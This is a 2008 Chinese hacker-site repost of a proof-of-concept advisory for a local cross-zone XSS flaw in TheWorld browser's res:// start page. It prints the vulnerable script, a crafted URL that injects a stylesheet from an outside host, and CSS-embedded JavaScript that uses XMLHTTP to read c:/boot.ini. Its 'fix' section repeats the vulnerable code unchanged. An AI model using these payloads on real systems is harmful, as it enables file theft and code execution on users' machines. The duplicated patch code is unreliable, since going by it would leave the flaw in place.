| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 新闻中心 >> 漏洞公告 >> 文章正文 用户登录 新用户注册

世界之窗等浏览器本地xss跨域漏洞POC           ★★★ 【字体：小 大】
世界之窗等浏览器本地xss跨域漏洞POC
作者：佚名    文章来源：ixpub    点击数：    更新时间：2008-7-3
-------------------------------------------------------------------------------------------- #主题描述# 世界之窗等浏览器本地xss跨域漏洞POC -------------------------------------------------------------------------------------------- #内容# 世界之窗等浏览器本地xss跨域漏洞POC 漏洞分析：世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll /TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下： <script language="JavaScript"> var nOldCount = 0; for( i = 0; i < g_nCountOld; i ++ ) { str_url = g_arr_argUrlOld[i]; str_name = g_arr_argNameOld[i]; str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”; document.write( str_td ); str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”; document.write( str_td ); nOldCount = i; g_bHasLastUrl = true; } </script> str_name和str_url不经过滤地直接输出，由于该页面处于本地安全区域，所以拥有很高的权限，可以做很多跨域操作，包括读取文件和运行本地程序。 漏洞修补： <script language="JavaScript"> var nOldCount = 0; for( i = 0; i < g_nCountOld; i ++ ) { str_url = g_arr_argUrlOld[i]; str_name = g_arr_argNameOld[i]; str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”; document.write( str_td ); str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”; document.write( str_td ); nOldCount = i; g_bHasLastUrl = true; } </script> 已经用js控制DOM显示了 漏洞演示：这里提供测试方法可以读取c:/boot.ini 1 打开如下地址： sc:h’><script>alert(document.write(unescape(”%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E”)))</script> 2 上面将导致一个不可访问的页面，然后直接关闭tw浏览器（ 没有好的办法crash,死循环? :) ） 3 重新打开tw浏览器，可以发[url]http://www.80sec.com/1.css[/url]中的内容被解析，并且有本地域的权限。 1.css内容，换成其他js代码一样执行 body { background-image: url(''javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);'') } 其他浏览器如极速浏览器也可能存在问题：）
文章录入：血腥魔术师    责任编辑：血腥魔术师
	上一篇文章： Mac OS X系统2008-004更新修复多个安全漏洞 下一篇文章： Flash漏洞最新疫情：一周感染近190万用户
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				黑帽大会：备受关注的互联网 微软推新计划打击黑客帮助安 鲍尔默：微软每年至少投资25 瑞星07月25日发布 每日病毒及 已有黑客在研制利用DNS漏洞程 腾讯官方版Linux QQ将于本月 无法进入安全模式 可能中招“ 瑞星公司07月15日发布 每日计 微软七月安全公告预告:四个重 PlayStation官方网站被注入恶

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.